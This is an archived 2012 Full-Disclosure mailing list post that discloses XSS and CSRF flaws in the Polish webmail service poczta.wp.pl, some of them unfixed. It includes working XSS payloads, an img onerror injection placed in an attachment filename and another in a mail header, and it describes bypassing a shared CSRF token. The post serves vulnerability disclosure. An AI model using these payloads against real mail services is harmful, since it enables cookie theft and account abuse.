lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 4 Dec 2012 13:20:49 +0100
From: Jakub Zoczek <zoczus@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Poczta.WP Multiple vulnerabilities - full
	disclosure

Poczta.WP Multiple vulnerabilities full disclosure security paper
Author: Jakub Zoczek [zoczus(x)gmail.com]


0x01 Intro
----------
Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service (poczta.wp.pl) is affected by multiple cross-site
scripting vulnerabilities and also one, almost fixed cross-site
request forgery bug. After long time of waiting - I got a
non-professional answer from Customer Service Manager of WP, so I
decided to post all my research here. Thus...

0x02 XSS in mail attachments.
----------
Reported: 10/10/2012
State: Fixed

Proof Of Concept:

For example - jpeg picture with filename:

sowa oraz "> inject <img src="boom.jpg"
onerror="alert(document.cookie);"> hhh.jpg

..sent as e-mail attachment.

Result:

http://q-x.ath.cx/~zoczus/poc/wp/wpxss1.png

0x03 XSRF in AntyHack and AntySpam fitler (adding to white list)
----------

Reported: 24/11/2012
State: "Fixed"

Proof Of Concept:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt

Result:

http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp1.jpg
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp2.jpg

0x04 XSRF in AntyHack and AntySpam fitler - bypassing 'fix' ;)
----------

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:
Additional info for 0x03 - as I supposed, WP used the token in a white
list form (every once in a while generated md5 of something). The
problem is, that the token value is probably the same for each user.
For different mail accounts, different browsers, different IP
addresses - token is the same...  Bypassing this protection seems to
be quite simple.

http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass1.png
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass2.png

0x05 XSS in mail headers
----------

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Return-Path: <zoczus@....pl>
Delivered-To: zoczus@...pl (zoczus)
Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012
16:04:58 +0100
Received: from emkei.cz ([46.167.245.118])
(envelope-sender <zoczus@....pl>)
by mx.wp.pl (WP-SMTPD) with SMTP
for <zoczus@...pl>; 30 Nov 2012 16:04:58 +0100
Received: by emkei.cz (Postfix, from userid 33)
id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: zoczus@...pl
Subject:
From: "zoczus@....pl" <zoczus@....pl>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: zoczus@....pl
Reply-To: zoczus@....pl
Content-Type: text/plain; charset=utf-8
Message-Id: <20121130150457.D4119D5807@...ei.cz>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph]

Dobre!

Result:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xss2.png


0x06 The end. :)

----
Best regards,
Jakub Zoczek

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists